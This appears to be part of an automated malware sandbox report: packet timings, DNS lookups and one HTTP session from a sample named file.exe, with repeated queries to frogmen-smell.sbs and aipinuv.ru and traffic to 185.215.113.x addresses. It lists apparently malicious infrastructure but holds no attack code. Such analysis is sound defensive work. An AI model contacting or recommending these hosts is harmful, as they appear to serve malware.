Nov 15, 2024 14:09:36.221815109 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.221827984 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.221837044 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.221847057 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.221874952 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.221998930 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222022057 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222032070 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222040892 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222049952 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222055912 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222058058 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222060919 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222062111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222073078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222084045 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222103119 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222117901 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222368956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222379923 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222390890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222412109 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222436905 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222553015 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222569942 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222579956 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222589970 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222593069 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222599983 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222606897 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222609043 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222613096 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222644091 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222655058 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222839117 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222850084 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222861052 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222866058 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222872019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222875118 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222897053 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222923994 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.222964048 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.222980022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223001957 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223012924 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223018885 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223026037 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223036051 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223041058 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223043919 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223051071 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223056078 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223057985 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223062992 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223073006 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223079920 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223102093 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223109961 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223591089 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223601103 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223611116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223619938 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223629951 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223639011 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223642111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223654032 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223654032 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223664999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223681927 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223696947 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223743916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223754883 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223762989 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223777056 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223779917 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223782063 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223788977 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223793030 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223797083 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223808050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223812103 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223823071 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223825932 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223839998 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223839998 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223853111 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223862886 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223866940 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223874092 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223881960 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223885059 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.223896027 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.223923922 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.224502087 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224514008 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224523067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224533081 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224541903 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224551916 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224555016 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.224564075 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224566936 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.224577904 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224582911 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.224590063 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.224596977 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.224620104 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.269582987 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.269594908 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.269604921 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.269614935 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.269632101 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.269666910 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.297699928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.297756910 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.297769070 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.297792912 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.297800064 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.297828913 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.297832966 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.297884941 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298017025 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298049927 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298058987 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298079967 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298085928 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298126936 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298136950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298173904 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298191071 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298224926 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298232079 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298259020 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298286915 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298294067 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298301935 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298347950 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298352957 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298382044 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298387051 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298417091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298433065 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298453093 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.298458099 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.298491001 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.299159050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.299194098 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.299211025 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.299226999 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.299228907 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.299294949 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.299309015 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.299331903 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.299423933 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.299459934 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.299473047 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.299496889 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336498022 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336554050 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336554050 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336584091 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336592913 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336622953 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336637020 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336671114 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336677074 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336707115 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336708069 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336743116 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336745977 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336776972 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336812019 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336817026 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336841106 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336850882 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336878061 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336891890 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336925983 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336934090 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.336961031 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.336991072 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.337002039 CET	49761	80	192.168.2.4	185.215.113.16
Nov 15, 2024 14:09:36.337002039 CET	80	49761	185.215.113.16	192.168.2.4
Nov 15, 2024 14:09:36.337035894 CET	49761	80	192.168.2.4	185.215.113.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 15, 2024 14:09:14.171006918 CET	192.168.2.4	1.1.1.1	0x5067	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:09:14.171008110 CET	192.168.2.4	1.1.1.1	0xf38e	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 15, 2024 14:09:17.742429972 CET	192.168.2.4	1.1.1.1	0x1c5d	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:09:17.742481947 CET	192.168.2.4	1.1.1.1	0x848f	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 15, 2024 14:09:18.748033047 CET	192.168.2.4	1.1.1.1	0x3a84	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:09:18.748172045 CET	192.168.2.4	1.1.1.1	0xc5b3	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 15, 2024 14:10:28.395675898 CET	192.168.2.4	1.1.1.1	0x23a2	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:03.486027002 CET	192.168.2.4	1.1.1.1	0x9379	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:03.486232042 CET	192.168.2.4	1.1.1.1	0x32aa	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Nov 15, 2024 14:11:03.622390032 CET	192.168.2.4	1.1.1.1	0x446f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:03.622729063 CET	192.168.2.4	1.1.1.1	0xe3c4	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 15, 2024 14:11:05.701581001 CET	192.168.2.4	1.1.1.1	0x25c	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:05.701719046 CET	192.168.2.4	1.1.1.1	0x951f	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Nov 15, 2024 14:11:12.908457994 CET	192.168.2.4	141.98.234.31	0x97cb	Standard query (0)	aipinuv.ru	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:16.158293962 CET	192.168.2.4	1.1.1.1	0x1e8b	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:39.860311985 CET	192.168.2.4	1.1.1.1	0xde96	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:58.728269100 CET	192.168.2.4	1.1.1.1	0x2da3	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:12:03.667604923 CET	192.168.2.4	1.1.1.1	0xa247	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:12:03.667922974 CET	192.168.2.4	1.1.1.1	0xe6ab	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 15, 2024 14:12:21.574788094 CET	192.168.2.4	1.1.1.1	0x6e6e	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:12:51.444406033 CET	192.168.2.4	1.1.1.1	0x943b	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:13:35.601870060 CET	192.168.2.4	1.1.1.1	0xcd58	Standard query (0)	frogmen-smell.sbs	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:16:14.045701981 CET	192.168.2.4	1.1.1.1	0xe3a	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:17:12.387636900 CET	192.168.2.4	1.1.1.1	0xfafb	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:17:42.596252918 CET	192.168.2.4	1.1.1.1	0xe461	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 15, 2024 14:09:14.177953005 CET	1.1.1.1	192.168.2.4	0x5067	No error (0)	www.google.com		142.250.185.68	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:09:14.178061008 CET	1.1.1.1	192.168.2.4	0xf38e	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 15, 2024 14:09:17.749557972 CET	1.1.1.1	192.168.2.4	0x1c5d	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:09:17.749557972 CET	1.1.1.1	192.168.2.4	0x1c5d	No error (0)	plus.l.google.com		142.250.185.78	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:09:17.750013113 CET	1.1.1.1	192.168.2.4	0x848f	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:09:18.755388021 CET	1.1.1.1	192.168.2.4	0x3a84	No error (0)	play.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:10:28.426683903 CET	1.1.1.1	192.168.2.4	0x23a2	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:10:28.426683903 CET	1.1.1.1	192.168.2.4	0x23a2	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:03.503345013 CET	1.1.1.1	192.168.2.4	0x641e	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:03.503345013 CET	1.1.1.1	192.168.2.4	0x641e	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:03.503345013 CET	1.1.1.1	192.168.2.4	0x641e	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:03.503711939 CET	1.1.1.1	192.168.2.4	0x66cd	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:03.508533955 CET	1.1.1.1	192.168.2.4	0x9379	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:03.508533955 CET	1.1.1.1	192.168.2.4	0x9379	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:03.508533955 CET	1.1.1.1	192.168.2.4	0x9379	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:03.508533955 CET	1.1.1.1	192.168.2.4	0x9379	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:03.508548975 CET	1.1.1.1	192.168.2.4	0x32aa	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:03.508548975 CET	1.1.1.1	192.168.2.4	0x32aa	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:03.633147955 CET	1.1.1.1	192.168.2.4	0x446f	No error (0)	www.google.com		142.250.185.196	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:03.634185076 CET	1.1.1.1	192.168.2.4	0xe3c4	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 15, 2024 14:11:05.312417030 CET	1.1.1.1	192.168.2.4	0xbb89	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:05.312417030 CET	1.1.1.1	192.168.2.4	0xbb89	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:05.312417030 CET	1.1.1.1	192.168.2.4	0xbb89	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:05.312424898 CET	1.1.1.1	192.168.2.4	0x6fb6	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:05.709260941 CET	1.1.1.1	192.168.2.4	0x25c	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:05.709260941 CET	1.1.1.1	192.168.2.4	0x25c	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:05.709260941 CET	1.1.1.1	192.168.2.4	0x25c	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:05.709260941 CET	1.1.1.1	192.168.2.4	0x25c	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:05.709718943 CET	1.1.1.1	192.168.2.4	0x951f	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:05.709718943 CET	1.1.1.1	192.168.2.4	0x951f	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 15, 2024 14:11:13.146562099 CET	141.98.234.31	192.168.2.4	0x97cb	No error (0)	aipinuv.ru		185.208.158.202	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:16.184149981 CET	1.1.1.1	192.168.2.4	0x1e8b	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:16.184149981 CET	1.1.1.1	192.168.2.4	0x1e8b	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:39.899352074 CET	1.1.1.1	192.168.2.4	0xde96	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:39.899352074 CET	1.1.1.1	192.168.2.4	0xde96	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:58.768284082 CET	1.1.1.1	192.168.2.4	0x2da3	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:11:58.768284082 CET	1.1.1.1	192.168.2.4	0x2da3	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:12:03.674552917 CET	1.1.1.1	192.168.2.4	0xa247	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:12:03.675051928 CET	1.1.1.1	192.168.2.4	0xe6ab	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 15, 2024 14:12:21.613368988 CET	1.1.1.1	192.168.2.4	0x6e6e	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:12:21.613368988 CET	1.1.1.1	192.168.2.4	0x6e6e	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:12:51.452287912 CET	1.1.1.1	192.168.2.4	0x943b	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:12:51.452287912 CET	1.1.1.1	192.168.2.4	0x943b	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:13:35.644866943 CET	1.1.1.1	192.168.2.4	0xcd58	No error (0)	frogmen-smell.sbs		172.67.174.133	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:13:35.644866943 CET	1.1.1.1	192.168.2.4	0xcd58	No error (0)	frogmen-smell.sbs		104.21.80.55	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:16:14.053580046 CET	1.1.1.1	192.168.2.4	0xe3a	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:17:12.394869089 CET	1.1.1.1	192.168.2.4	0xfafb	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Nov 15, 2024 14:17:42.604197979 CET	1.1.1.1	192.168.2.4	0xe461	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.206	80	4940	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
